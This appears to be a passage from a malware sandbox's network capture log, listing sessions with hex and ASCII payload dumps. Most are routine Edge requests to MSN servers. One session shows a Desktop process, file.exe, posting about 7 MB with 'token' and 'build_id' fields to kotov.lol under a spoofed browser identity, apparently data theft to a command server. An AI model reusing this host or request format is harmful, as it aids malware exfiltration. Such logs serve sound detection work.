2024-11-29 11:28:09 UTC	3782	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 39 54 31 31 3a 32 38 3a 30 36 2e 32 32 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 34 62 34 39 64 38 30 2d 33 32 38 66 2d 34 37 34 39 2d 39 32 63 34 2d 32 36 38 34 31 61 39 33 31 32 36 30 22 2c 22 65 70 6f 63 68 22 3a 22 31 32 32 34 32 34 31 36 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-29T11:28:06.224Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"d4b49d80-328f-4749-92c4-26841a931260","epoch":"1224241665"},"app":{"locale
2024-11-29 11:28:09 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=5280dd554e8f4c4a945e5ac5bd8c0e0c&HASH=5280&LV=202411&V=4&LU=1732879689647; Domain=.microsoft.com; Expires=Sat, 29 Nov 2025 11:28:09 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=ca652dd9e16840759848a8cf5ab61b9d; Domain=.microsoft.com; Expires=Fri, 29 Nov 2024 11:58:09 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3416 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49812	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Sat, 23 Nov 2024 13:20:48 GMT X-Source-Length: 1658 X-Datacenter: westus X-ActivityId: 4d48a1b6-f53b-4e77-9d86-8bdbb1376117 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=309305 Expires: Tue, 03 Dec 2024 01:23:14 GMT Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:09 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49813	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT X-Datacenter: northeu X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=52041 Expires: Sat, 30 Nov 2024 01:55:30 GMT Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:09 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49814	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G Last-Modified: Sat, 23 Nov 2024 18:14:45 GMT X-Source-Length: 5699 X-Datacenter: eastus X-ActivityId: 5c4ddcbc-0d99-4ea0-a3c4-13e18d04c61f Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=326734 Expires: Tue, 03 Dec 2024 06:13:43 GMT Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:09 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49816	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:10 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 17 Nov 2024 01:27:48 GMT X-Datacenter: eastus X-ActivityId: 4e8f5161-6e89-49b3-b675-e3ba25e83bf7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=136853 Expires: Sun, 01 Dec 2024 01:29:02 GMT Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:10 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49815	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	634	OUT	GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:10 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb Last-Modified: Fri, 15 Nov 2024 21:15:54 GMT X-Source-Length: 3765 X-Datacenter: westus X-ActivityId: f3e4c9dc-fa16-4ee6-89a5-1e9169e1c90d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 3765 Cache-Control: public, max-age=424096 Expires: Wed, 04 Dec 2024 09:16:25 GMT Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:10 UTC	3765	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 01 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 3e 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 Data Ascii: PNGIHDR22?gAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49811	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	320	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AKKKFBGDHJKFHJJJJDGCCont
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
